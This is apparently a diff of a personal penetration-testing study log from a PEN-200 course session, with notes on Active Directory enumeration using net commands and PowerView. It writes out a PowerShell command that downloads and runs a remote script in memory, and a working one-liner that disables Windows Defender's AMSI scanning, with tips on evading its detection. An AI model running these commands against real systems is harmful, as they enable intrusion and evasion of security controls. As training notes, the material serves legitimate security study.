cardboard-iguana/cardboard-iguana.com/log/2022-08-24-offsec-live-pen-200-and-aws-deep-dive.md

 * See all Windows administrators for the local system: `net localgroup administrators`
 * By default, all members of the `Domain Admins` domain group are admins of both the *domain* and *all* machines in that domain.
 * One way to show domain group membership is to use `net group $GROUP /domain`.
 However, this *doesn’t* show domain groups that are members of that group; for this you need to use PowerShell.
+* A good enumeration tool is `PowerView.ps1`.
-* The `Get-DomainUsers | select name, memberof` PowerShell command will get domain users and associated groups.
+* One tool supplied by `PowerView.ps1` is the `Get-DomainUsers | select name, memberof` command, which gets domain users and associated groups.
-* The `Get-DomainGroupMember -Identity $GROUP_NAME` PowerShell command will get all domain group members, *including* nested domain groups.
+* The `Get-DomainGroupMember -Identity $GROUP_NAME` command for `PowerView.ps1` will get all domain group members, *including* nested domain groups.
-* The `Get-NetLoggedon | select UserName` PowerShell command will show all users that previously logged on to the current machine.
+* Another `PowerView.ps1` command is `Get-NetLoggedon | select UserName`, will show all users that previously logged on to the current machine.
 It requires administrative privileges to be run against remote machines.
-* The `Get-NetSession` PowerShell command will show all users who are logged in to the current machine *right now*.
+* The `Get-NetSession` command for `PowerView.ps1` shows all users who are logged in to the current machine *right now*.
 It can be called *without* admin privileges from Windows Server systems.
-* A good enumeration tool is `PowerView.ps1`.
-For example, it includes the `Invoke-UserHunter` command that bundles up `Get-NetLoggedon` and `Get-NetSession` to hunt for currently logged in domain admins.
+* Finally, the `Invoke-UserHunter` command for `PowerView.ps1` bundles up `Get-NetLoggedon` and `Get-NetSession` to hunt for currently logged in domain admins.
 * You can download a remote script into memory and execute it using PowerShell using `IEX (New-Object System.Net.Webclient).DownloadString("$SCRIPT_URL")`.
 You can also load scripts into variables this way (just replace `IEX` with a variable assignment).
 * Windows Defender uses a process called AMSI that triggers when a script is run in PowerShell (this includes invocations of `IEX` for in-memory scripts).
 However, there’s a lot of bypasses for this — for example, you can cause the AMSI init function to error out using `[REF].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)`.
 * AMSI traps all PowerShell commands that contain all AMSI-function related strings, however.
 The search uses regular expressions, and can be bypassed by putting portions of the script you’re trying to call in variables, and then calling these instead.
 If you really need a one-liner, you can also do some fancy hex code conversion (see the “Bypass AMSI by manual modification” link).